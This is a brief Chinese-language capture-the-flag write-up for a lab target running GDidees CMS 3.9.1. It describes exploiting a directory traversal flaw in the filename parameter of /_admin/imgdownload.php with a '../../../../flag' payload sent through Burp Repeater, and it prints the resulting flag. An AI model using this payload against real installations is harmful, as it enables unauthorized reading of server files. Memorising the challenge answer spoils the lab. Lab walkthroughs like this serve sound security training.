靶标介绍
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
本关卡为本地文件泄露/目录遍历漏洞利用
打开构造的实验环境,可以看到logo图,在界面上没有找到有用信息
通过靶场介绍得知,漏洞通过位于/_admin/imgdownload.php的filename参数进行利用,因为我们要找flag,所以构造访问目录
http://eci-2ze1p5fqkpnej1ifvj3e.cloudeci1.ichunqiu.com//_admin/imgdownload.php?filename=flag
发现可以下载文件,flag.png,但是打开后没有flag
使用Burp工具对该界面进行抓包,把包发送到repeater
构造目录找flag
_admin/imgdownload.php?filename=../../../../flag
直接得到了flag
flag{4da5239d-cefd-41ec-b8cb-7b4cf1a511fb}